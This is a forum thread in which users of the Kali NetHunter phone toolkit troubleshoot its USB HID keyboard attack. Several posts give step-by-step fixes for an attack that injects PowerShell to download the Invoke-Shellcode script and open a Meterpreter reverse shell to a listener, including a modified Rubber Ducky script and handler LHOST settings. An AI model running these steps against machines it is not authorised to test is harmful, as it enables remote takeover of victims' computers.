Thread: HID Keyboard attack produces strange error in other kali machine

  1. #1
    Join Date
    2015-Apr
    Posts
    1

    HID Keyboard attack produces strange error in other kali machine

    After I updated my Kali Nethunter (expecting bugs) I decided to test out HID Keyboard and it produces this error on my other machine:
    Started HTTPS reverse handler on https://0.0.0.0:4444/
    Starting the payload handler...
    192.168.1.11:57054 Request received for /INITM
    Unknown Request to /INITM and something about Firefox. Anyone else experiencing these errors?

  2. #2
    Join Date
    2015-Jul
    Posts
    7
    I'm having the same issue, Nexus 7 2013. I'm attempting to run the handler on the tablet as well. Running the HID attack causes powershell to crash after everything is input.
    Last edited by Swacky12; 2015-07-11 at 05:09. Reason: Resolution of bug image was poor

  3. #3
    You have found a bug yet.
    Maybe because someone hacked you already.

  4. #4
    Join Date
    2015-Jul
    Posts
    7
    Well I've tried it on 3 different test boxes which should have had no exposure before and gotten the same error. Different ports etc.

  5. #5
    Join Date
    2015-Jul
    Posts
    7
    I've now bypassed the issue using a modified ducky script as my nethunter HID attack to gain a shell. I suspect this issue can be fixed by using an older source shell. Will try modifying the source to the successfully tested shell and will report back.

  6. #6
    Join Date
    2015-Jul
    Posts
    4
    Hey guys,

    I am having the same issue... has anyone found a solution for this?

  7. #7
    Join Date
    2015-Jul
    Posts
    7
    Stoof, I can't tell you how to fix it, but I can tell you how I implemented the workaround to do virtually the same thing as the stock HID attack. Using the Rubber Ducky HID scripting that is also part of Nethunter you can use:

    https://forums.hak5.org/index.php?/t...oull-ever-get/

    It takes some small setup; however, as someone else has pointed out on the forums, the key sets are out of date, most notably not entering certain characters like the underscore, which screws up the injection.

    Keeping that in mind here are the steps to follow:

    -Open up the HID Ducky Script Attacks in the Nethunter App
    -Set your language to "British English" in the drop-down menu in the upper right
    -Copy over and implement the Ducky Script in the above link, placing your own IP and ports etc. in the applicable spaces, BUT there are a few items that must be changed:
    **Change all instances of quotation marks to the @ sign and vice versa
    **Change the bit.ly link to your preferred meterpreter shell code or make a tinyurl of https://raw.githubusercontent.com/ma...-Shellcode.ps1

    Not changing the bit.ly link will cause you to run a program saying you are silly to trust something ready to go from the internet without checking first.

    After you've done that you should be able to use the attack; set up your handler to handle reverse_https and you should be good to go. In all likelihood the script can probably be changed so as not to make a file and then run it, but to run it immediately, but I am somewhat short on time to alter that.

    Should it be desired I can post the ready-to-go ducky code of the attack or go into more detail. I'm still seeing if I can make a fix for the main HID attack, but this is the workaround I've come up with in the meantime that does the same basic thing.

    Cheers,
    Swacky

  8. #8
    Join Date
    2015-Jul
    Posts
    4
    Hi Swacky,

    Thanks for your reply.
    In the meanwhile I found a solution to fix the keyboard HID attack, well... sort of... Now the powershell does not crash anymore, and a meterpreter shell is spawned; however it closes after approx. 10 seconds with the message: "Meterpreter session 1 is not valid and will be closed"
    What I did was replace the payload script in nethunter, which is in fact the PowerSploit Invoke-Shellcode.ps1 script.
    Steps taken:

    1. Open nethunter on the Nexus and go to Kali launcher
    2. Choose option Launch Kali in Terminal
    3. Browse to the apache folder: "cd /var/www"
    4. Edit the invoke-shellcode script: "nano payload"
    5. Copy the last line in the file which says "Invoke-Shellcode -Payload windows/meterpreter/reverse_http........."
    6. Download the latest version of the Invoke-Shellcode.ps1 script here: "https://github.com/mattifestation/PowerSploit/tree/master/CodeExecution/Invoke--Shellcode.ps1"
    7. Edit the downloaded script file, paste the line you copied from the payload file at the end of the downloaded script file and save it.
    8. Make sure you put the downloaded script file in the /var/www folder, rename the original payload to payload.orig ("mv payload payload.orig") and rename the newly downloaded one to payload ("mv Invoke--Shellcode.ps1 payload")
    9. Make sure the file permissions are set correctly: "chmod --reference payload.orig payload"

    When you run the HID attack script now like you would normally do, you will see that it works... but the meterpreter session will die after xx seconds with the message "Meterpreter session x is not valid and will be closed"...

    The box I run my listener on is a Raspberry Pi running metasploit v4.11.4-2015071402... maybe that is the problem... I have not had the chance to test it with a different Kali installation yet.
    So one step closer, but not quite there yet...

    stoof

  9. #9
    Join Date
    2015-Jul
    Posts
    7
    Ah, I did have that problem briefly as well, and it was solved by an offhand tweet by one of the creators of metasploit that I found while googling the error myself. To paraphrase, the problem is that the handler is being given a bad LHOST IP. Perhaps something like 192.168.0.3/24? The /24 part is entirely unnecessary and creates that error when I use that as the LHOST on the reverse handler.

    The relevant post was: https://twitter.com/hdmoore/status/598142217031688193

    Hope that helps

  10. #10
    Join Date
    2015-Jul
    Posts
    4
    You are right Swacky12, it was an LHOST IP problem on the handler side; even if you have port forwarding enabled you should still enter the external WAN IP as LHOST. Got it sorted now.
    So I have the USB HID attack fully working, and I can use the ducky script as backup; both are working fine :-)

  11. #11
    Join Date
    2015-Jul
    Posts
    7
    Awesome, and thanks to you we have an easy guide to the stock fix. I don't suppose you can make a pull request on the Nethunter GitHub for the fix for future versions?

  12. #12
    Join Date
    2015-Jul
    Posts
    4
    Pull request created for this fix ;-)
    https://github.com/offensive-securit...unter/pull/229
    Last edited by stoof; 2015-07-31 at 15:26.
